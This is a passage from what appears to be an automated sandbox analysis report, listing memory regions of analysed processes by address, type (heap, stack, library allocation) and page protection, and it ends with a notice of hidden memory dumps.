page read and write
|
||
|
26EDC11F000
|
heap
|
page read and write
|
||
|
26EDC1C4000
|
heap
|
page read and write
|
||
|
26EDC190000
|
heap
|
page read and write
|
||
|
2A6902F6000
|
trusted library allocation
|
page read and write
|
||
|
2A69006D000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0B0000
|
trusted library allocation
|
page read and write
|
||
|
4A52FBE000
|
stack
|
page read and write
|
||
|
B2DEDFE000
|
stack
|
page read and write
|
||
|
2A6F9670000
|
trusted library allocation
|
page read and write
|
||
|
26EDC1B0000
|
heap
|
page read and write
|
||
|
26EDC180000
|
heap
|
page read and write
|
||
|
26EDDF10000
|
heap
|
page read and write
|
||
|
7FFB4B080000
|
trusted library allocation
|
page read and write
|
||
|
2A680001000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE30000
|
trusted library allocation
|
page read and write
|
||
|
26EDC192000
|
heap
|
page read and write
|
||
|
23D47D80000
|
trusted library allocation
|
page read and write
|
||
|
B2DE8FA000
|
stack
|
page read and write
|
||
|
2A682243000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B000000
|
trusted library allocation
|
page read and write
|
||
|
23D48164000
|
trusted library allocation
|
page read and write
|
||
|
23D45D70000
|
heap
|
page read and write
|
||
|
26EDDEF4000
|
heap
|
page read and write
|
||
|
2A681924000
|
trusted library allocation
|
page read and write
|
||
|
23D47D42000
|
trusted library allocation
|
page read and write
|
||
|
26EDC162000
|
heap
|
page read and write
|
||
|
7FFB4AD82000
|
trusted library allocation
|
page read and write
|
||
|
2A6F7D60000
|
trusted library allocation
|
page read and write
|
||
|
23D45FC0000
|
trusted library allocation
|
page read and write
|
||
|
B2DF3FF000
|
stack
|
page read and write
|
||
|
B2DF0FE000
|
stack
|
page read and write
|
||
|
23D4812F000
|
trusted library allocation
|
page read and write
|
||
|
BBEC63E000
|
stack
|
page read and write
|
||
|
23D47A10000
|
heap
|
page execute and read and write
|
||
|
2A6F9AF0000
|
heap
|
page read and write
|
||
|
2A6F97A0000
|
heap
|
page execute and read and write
|
||
|
26EDC180000
|
heap
|
page read and write
|
||
|
7FFB4B090000
|
trusted library allocation
|
page read and write
|
||
|
23D47D2E000
|
trusted library allocation
|
page read and write
|
||
|
2A690011000
|
trusted library allocation
|
page read and write
|
||
|
26EDC16B000
|
heap
|
page read and write
|
||
|
2A6F7D76000
|
heap
|
page read and write
|
||
|
7FFB4AE36000
|
trusted library allocation
|
page read and write
|
||
|
2A6FA06A000
|
heap
|
page read and write
|
||
|
2A6FA06C000
|
heap
|
page read and write
|
||
|
23D57C21000
|
trusted library allocation
|
page read and write
|
||
|
23D460B0000
|
heap
|
page read and write
|
||
|
BBEC5BD000
|
stack
|
page read and write
|
||
|
7FFB4AF3A000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B230000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFB0000
|
trusted library allocation
|
page read and write
|
||
|
2A6F9FFA000
|
heap
|
page read and write
|
||
|
2A6F9B56000
|
heap
|
page read and write
|
||
|
4A52D3E000
|
stack
|
page read and write
|
||
|
BBEC0FE000
|
stack
|
page read and write
|
||
|
23D482B7000
|
trusted library allocation
|
page read and write
|
||
|
B2DECFF000
|
stack
|
page read and write
|
||
|
23D481A8000
|
trusted library allocation
|
page read and write
|
||
|
2A6F9694000
|
heap
|
page read and write
|
||
|
23D48030000
|
trusted library allocation
|
page read and write
|
||
|
23D47B1B000
|
heap
|
page read and write
|
||
|
26EDDF02000
|
heap
|
page read and write
|
||
|
7FFB4AFC0000
|
trusted library allocation
|
page read and write
|
||
|
23D45F80000
|
heap
|
page read and write
|
||
|
23D45E46000
|
heap
|
page read and write
|
||
|
B2DF1FF000
|
stack
|
page read and write
|
||
|
23D60060000
|
heap
|
page read and write
|
||
|
2A6F7AEE000
|
heap
|
page read and write
|
||
|
23D5FF60000
|
heap
|
page read and write
|
||
|
23D460B5000
|
heap
|
page read and write
|
||
|
26EDDF02000
|
heap
|
page read and write
|
||
|
7FFB4B104000
|
trusted library allocation
|
page read and write
|
||
|
4A52C7F000
|
stack
|
page read and write
|
||
|
2A6814B8000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF42000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF50000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AF62000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ADBC000
|
trusted library allocation
|
page execute and read and write
|
||
|
26EDC09B000
|
heap
|
page read and write
|
||
|
26EDC10F000
|
heap
|
page read and write
|
||
|
7FFB4B050000
|
trusted library allocation
|
page read and write
|
||
|
4A529FE000
|
stack
|
page read and write
|
||
|
2A6F9FB9000
|
heap
|
page read and write
|
||
|
4A52A7E000
|
stack
|
page read and write
|
||
|
2A6F7B12000
|
heap
|
page read and write
|
||
|
26EDC157000
|
heap
|
page read and write
|
||
|
7FFB4AD70000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AD84000
|
trusted library allocation
|
page read and write
|
||
|
26EDC110000
|
heap
|
page read and write
|
||
|
2A6F9B87000
|
heap
|
page read and write
|
||
|
7FFB4B020000
|
trusted library allocation
|
page read and write
|
||
|
23D48048000
|
trusted library allocation
|
page read and write
|
||
|
BBEC73E000
|
stack
|
page read and write
|
||
|
26EDC149000
|
heap
|
page read and write
|
||
|
2A6803E6000
|
trusted library allocation
|
page read and write
|
||
|
2A6821F4000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B080000
|
trusted library allocation
|
page read and write
|
||
|
4A52AFC000
|
stack
|
page read and write
|
||
|
2A681938000
|
trusted library allocation
|
page read and write
|
||
|
2A6F95E0000
|
heap
|
page execute and read and write
|
||
|
26EDC13A000
|
heap
|
page read and write
|
||
|
23D45E3D000
|
heap
|
page read and write
|
||
|
4A5313B000
|
stack
|
page read and write
|
||
|
4A52BFE000
|
stack
|
page read and write
|
||
|
26EDC147000
|
heap
|
page read and write
|
||
|
2A680F11000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B200000
|
trusted library allocation
|
page read and write
|
||
|
4A52873000
|
stack
|
page read and write
|
||
|
23D47AF1000
|
heap
|
page read and write
|
||
|
4A528FE000
|
stack
|
page read and write
|
||
|
2A6F9F4A000
|
heap
|
page read and write
|
||
|
23D47D48000
|
trusted library allocation
|
page read and write
|
||
|
26EDC0E0000
|
heap
|
page read and write
|
||
|
23D57C8D000
|
trusted library allocation
|
page read and write
|
||
|
2A682137000
|
trusted library allocation
|
page read and write
|
||
|
2A68046F000
|
trusted library allocation
|
page read and write
|
||
|
2A681F69000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B070000
|
trusted library allocation
|
page read and write
|
||
|
23D47D37000
|
trusted library allocation
|
page read and write
|
||
|
BBEC538000
|
stack
|
page read and write
|
||
|
23D45DF5000
|
heap
|
page read and write
|
||
|
BBEC6BF000
|
stack
|
page read and write
|
||
|
7DF413AF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A6FA23D000
|
heap
|
page read and write
|
||
|
26EDDEFE000
|
heap
|
page read and write
|
||
|
26EDC156000
|
heap
|
page read and write
|
||
|
2A6F7A30000
|
heap
|
page read and write
|
||
|
7FFB4AD80000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AD90000
|
trusted library allocation
|
page read and write
|
||
|
26EDDEF7000
|
heap
|
page read and write
|
||
|
23D48160000
|
trusted library allocation
|
page read and write
|
||
|
26EDC14F000
|
heap
|
page read and write
|
||
|
7FFB4AD8D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AF80000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF1A000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B020000
|
trusted library allocation
|
page read and write
|
||
|
23D46010000
|
heap
|
page execute and read and write
|
||
|
B2DE9FE000
|
stack
|
page read and write
|
||
|
7FFB4AE3C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A6902FB000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AD83000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A6F9B8C000
|
heap
|
page read and write
|
||
|
23D45E15000
|
heap
|
page read and write
|
||
|
7FFB4AD62000
|
trusted library allocation
|
page read and write
|
||
|
2A6F9F78000
|
heap
|
page read and write
|
||
|
2A6FA080000
|
heap
|
page read and write
|
||
|
2A6809CF000
|
trusted library allocation
|
page read and write
|
||
|
26EDC15F000
|
heap
|
page read and write
|
||
|
4A5297E000
|
stack
|
page read and write
|
||
|
2A690001000
|
trusted library allocation
|
page read and write
|
||
|
23D47D4B000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF31000
|
trusted library allocation
|
page read and write
|
||
|
2A6F7CF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AFE0000
|
trusted library allocation
|
page read and write
|
||
|
26EDC098000
|
heap
|
page read and write
|
||
|
26EDC09D000
|
heap
|
page read and write
|
||
|
23D47AD0000
|
heap
|
page read and write
|
||
|
7FFB4B0A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AD9C000
|
trusted library allocation
|
page read and write
|
||
|
23D47C45000
|
trusted library allocation
|
page read and write
|
||
|
26EDC09D000
|
heap
|
page read and write
|
||
|
7FFB4B030000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE16000
|
trusted library allocation
|
page read and write
|
||
|
2A6F7DD4000
|
heap
|
page read and write
|
||
|
26EDC14F000
|
heap
|
page read and write
|
||
|
2A6FA23A000
|
heap
|
page read and write
|
||
|
2A68042D000
|
trusted library allocation
|
page read and write
|
||
|
2A681138000
|
trusted library allocation
|
page read and write
|
||
|
2A68046A000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF22000
|
trusted library allocation
|
page read and write
|
||
|
26EDC110000
|
heap
|
page read and write
|
||
|
7FFB4AF80000
|
trusted library allocation
|
page read and write
|
||
|
BBEC2FE000
|
stack
|
page read and write
|
||
|
26EDC14E000
|
heap
|
page read and write
|
||
|
23D47BA0000
|
heap
|
page execute and read and write
|
||
|
7FFB4AD6D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A68190F000
|
trusted library allocation
|
page read and write
|
||
|
2A6F9EB0000
|
heap
|
page read and write
|
||
|
2A6FA070000
|
heap
|
page read and write
|
||
|
23D5FF80000
|
heap
|
page read and write
|
||
|
BBED28D000
|
stack
|
page read and write
|
||
|
23D47C3D000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFF0000
|
trusted library allocation
|
page read and write
|
||
|
23D48042000
|
trusted library allocation
|
page read and write
|
||
|
BBEC07D000
|
stack
|
page read and write
|
||
|
7FFB4AF20000
|
trusted library allocation
|
page execute and read and write
|
||
|
26EDC090000
|
heap
|
page read and write
|
||
|
2A6821CC000
|
trusted library allocation
|
page read and write
|
||
|
2A681C28000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B050000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE80000
|
trusted library allocation
|
page execute and read and write
|
||
|
26EDC15E000
|
heap
|
page read and write
|
||
|
7FFB4AFA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AD63000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B109000
|
trusted library allocation
|
page read and write
|
||
|
2A6F7AB8000
|
heap
|
page read and write
|
||
|
B2DF2FB000
|
stack
|
page read and write
|
||
|
7FFB4AE10000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE66000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B0D0000
|
trusted library allocation
|
page read and write
|
||
|
2A681B92000
|
trusted library allocation
|
page read and write
|
||
|
26EDC19E000
|
heap
|
page read and write
|
||
|
BBEC83B000
|
stack
|
page read and write
|
||
|
2A68189A000
|
trusted library allocation
|
page read and write
|
||
|
2A6803DC000
|
trusted library allocation
|
page read and write
|
||
|
2A6F9F9D000
|
heap
|
page read and write
|
||
|
23D4801C000
|
trusted library allocation
|
page read and write
|
||
|
7DF44B830000
|
trusted library allocation
|
page execute and read and write
|
||
|
23D47A25000
|
heap
|
page read and write
|
||
|
2A6F9C96000
|
heap
|
page read and write
|
||
|
23D47FF2000
|
trusted library allocation
|
page read and write
|
||
|
23D47A30000
|
heap
|
page read and write
|
||
|
2A6F9B50000
|
heap
|
page read and write
|
||
|
23D45DB0000
|
heap
|
page read and write
|
||
|
7FFB4B1C0000
|
trusted library allocation
|
page read and write
|
||
|
26EDC180000
|
heap
|
page read and write
|
||
|
2A680073000
|
trusted library allocation
|
page read and write
|
||
|
2A6F7CD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE40000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A52B7F000
|
stack
|
page read and write
|
||
|
2A6803F1000
|
trusted library allocation
|
page read and write
|
||
|
26EDC164000
|
heap
|
page read and write
|
||
|
2A6F9AFA000
|
heap
|
page read and write
|
||
|
BBEC27E000
|
stack
|
page read and write
|
||
|
2A6F7AF3000
|
heap
|
page read and write
|
||
|
26EDC148000
|
heap
|
page read and write
|
||
|
B2DEAFF000
|
stack
|
page read and write
|
||
|
2A6F7A60000
|
heap
|
page read and write
|
||
|
23D45DC7000
|
heap
|
page read and write
|
||
|
2A68197D000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0C0000
|
trusted library allocation
|
page read and write
|
||
|
4A52EBC000
|
stack
|
page read and write
|
||
|
2A6FA0A7000
|
heap
|
page read and write
|
||
|
7FFB4AF60000
|
trusted library allocation
|
page read and write
|
||
|
2A6F7D74000
|
heap
|
page read and write
|
There are 415 hidden memdumps, click here to show them.